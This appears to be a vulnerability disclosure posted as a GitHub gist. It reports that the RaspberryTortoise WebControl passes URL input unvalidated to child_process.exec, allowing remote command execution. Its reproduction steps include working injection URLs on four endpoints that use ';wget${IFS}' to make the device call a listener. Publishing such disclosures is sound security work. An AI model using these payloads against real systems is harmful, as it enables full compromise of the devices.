Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Suggeted description
The WebControl in
RaspberryTortoise through 2012-10-28 is vulnerable to remote code execution via shell metacharacters in a URI.
The file nodejs/raspberryTortoise.js has no validation on the
parameter incomingString before passing it to the child_process.exec
function.
------------------------------------------
[Additional Information]
Steps to Reproduce:
1. Start the RaspberryTortoise Webcontrol as mentioned in https://github.com/raspberrytorte/tortoise/tree/master/nodejs
2. Start your local server for example, `python3 -m http.server 80`
3. Go to the below url
http://127.0.0.1:8080/backward?0.05;wget${IFS}127.0.0.1/abcd
4. You should receive a request on your local webserver
All the below components are also vulnerable.
http://127.0.0.1:8080/forward?0.05;wget${IFS}127.0.0.1/abcd
http://127.0.0.1:8080/left?0.05;wget${IFS}127.0.0.1/abcd
http://127.0.0.1:8080/right?0.05;wget${IFS}127.0.0.1/abcd
------------------------------------------
[VulnerabilityType Other]
Remote Code Execution
------------------------------------------
[Vendor of Product]
Raspberry Torte
------------------------------------------
[Affected Product Code Base]
RaspberryTortoise Webcontrol - latest
------------------------------------------
[Affected Component]
backward
left
right
forward
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can exploit this vulnerability by crafting payload in
http://tortoise-ip/backward?0.05 for example to obtain blind remote
code execution. Due to this flaw, it leads to complete compromise of
the system.
------------------------------------------
[Reference]
https://github.com/raspberrytorte/tortoise/tree/master/nodejs
------------------------------------------
[Discoverer]
Preetham Bomma
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.